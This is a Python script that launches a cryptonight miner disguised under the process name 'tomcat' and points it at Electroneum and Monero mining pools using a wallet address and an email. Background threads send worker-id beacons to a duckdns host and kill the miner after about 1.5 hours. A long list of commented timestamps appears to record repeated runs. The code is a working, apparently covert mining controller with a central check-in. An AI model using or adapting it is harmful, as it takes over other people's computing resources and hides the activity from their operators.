import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:15:08.083251
#2018-02-17 16:04:07.089924
#2018-02-17 17:53:06.197733
#2018-02-17 19:42:03.814637
#2018-02-17 21:31:06.497501
#2018-02-17 23:15:09.553602
#2018-02-18 01:02:02.240660
#2018-02-18 02:50:06.414494
#2018-02-18 04:39:04.893697
#2018-02-18 06:31:04.133857
#2018-02-18 08:19:04.900593
#2018-02-18 10:07:01.238135
#2018-02-18 11:53:04.251213
#2018-02-18 13:38:06.545659
#2018-02-18 15:28:05.300274
#2018-02-18 17:17:04.690865
#2018-02-18 19:06:06.871253
#2018-02-18 20:52:03.995773
#2018-02-18 22:37:04.788669
#2018-02-19 00:26:04.796558
#2018-02-19 02:11:06.165662
#2018-02-19 03:59:06.262496
#2018-02-19 05:44:01.886757
#2018-02-19 07:33:04.550058
#2018-02-19 09:23:03.538941
#2018-02-19 11:12:02.171748
#2018-02-19 12:58:08.419076
#2018-02-19 14:47:05.655442
#2018-02-19 16:37:04.402916
#2018-02-19 18:24:03.104803
#2018-02-19 20:09:01.859715
#2018-02-19 21:58:06.046791
#2018-02-19 23:43:03.824159
#2018-02-20 01:31:07.121690
#2018-02-20 03:19:06.988249
#2018-02-20 05:06:07.546473
#2018-02-20 06:49:05.783852
#2018-02-20 08:35:08.514696
#2018-02-20 10:20:10.111066
#2018-02-20 12:05:05.074024
#2018-02-20 13:53:04.776632
#2018-02-20 15:38:01.919766
#2018-02-20 17:22:04.005963
#2018-02-20 19:11:04.631323
#2018-02-20 21:01:05.622491
#2018-02-20 22:45:09.149261
#2018-02-21 00:28:08.162883
#2018-02-21 02:13:08.331775
#2018-02-21 03:59:06.566536
#2018-02-21 05:46:07.591915
#2018-02-21 07:35:06.928197
#2018-02-21 09:20:03.923808
#2018-02-21 11:09:05.156589
#2018-02-21 12:57:05.250551
#2018-02-21 14:44:12.320133
#2018-02-21 16:31:01.943376
#2018-02-21 18:21:02.040936
#2018-02-21 20:06:04.969991
#2018-02-21 21:54:06.745458
#2018-02-21 23:41:04.368173
#2018-02-22 01:29:05.387072
#2018-02-22 03:17:03.797929
#2018-02-22 05:04:02.276821
#2018-02-22 06:47:04.152128
#2018-02-22 08:36:01.243695
#2018-02-22 10:22:08.715184
#2018-02-22 12:09:09.413685
#2018-02-22 13:54:07.029852
#2018-02-22 15:42:01.572911
#2018-02-22 17:27:05.370271
#2018-02-22 19:14:08.291308
#2018-02-22 21:06:04.474804
#2018-02-22 22:50:08.271765
#2018-02-23 00:37:06.228017
#2018-02-23 02:25:04.382486
#2018-02-23 04:14:04.457087
#2018-02-23 06:01:04.156593
#2018-02-23 07:31:06.136543
#2018-02-23 09:33:06.438942
#2018-02-23 11:16:05.792972
#2018-02-23 12:38:06.301033
#2018-02-23 14:05:09.376262
#2018-02-23 15:41:08.616206
#2018-02-23 17:13:06.220699
#2018-02-23 19:07:08.107950
#2018-02-23 20:41:05.698853
#2018-02-23 22:17:07.694277
#2018-02-23 23:50:10.346597
#2018-02-24 01:24:07.662811
#2018-02-24 03:01:04.065062
#2018-02-24 04:37:05.458990
#2018-02-24 06:09:05.387815
#2018-02-24 07:43:03.839275
#2018-02-24 09:16:07.221217
#2018-02-24 11:02:05.773877
#2018-02-24 12:35:03.800577
#2018-02-24 14:13:01.694831
#2018-02-24 15:47:07.384794
#2018-02-24 17:24:04.164240
#2018-02-24 18:55:07.035495
#2018-02-24 20:28:03.754127
#2018-02-24 21:57:06.964793
#2018-02-25 02:04:04.741072
#2018-02-25 05:58:06.367070
#2018-02-25 11:39:04.228024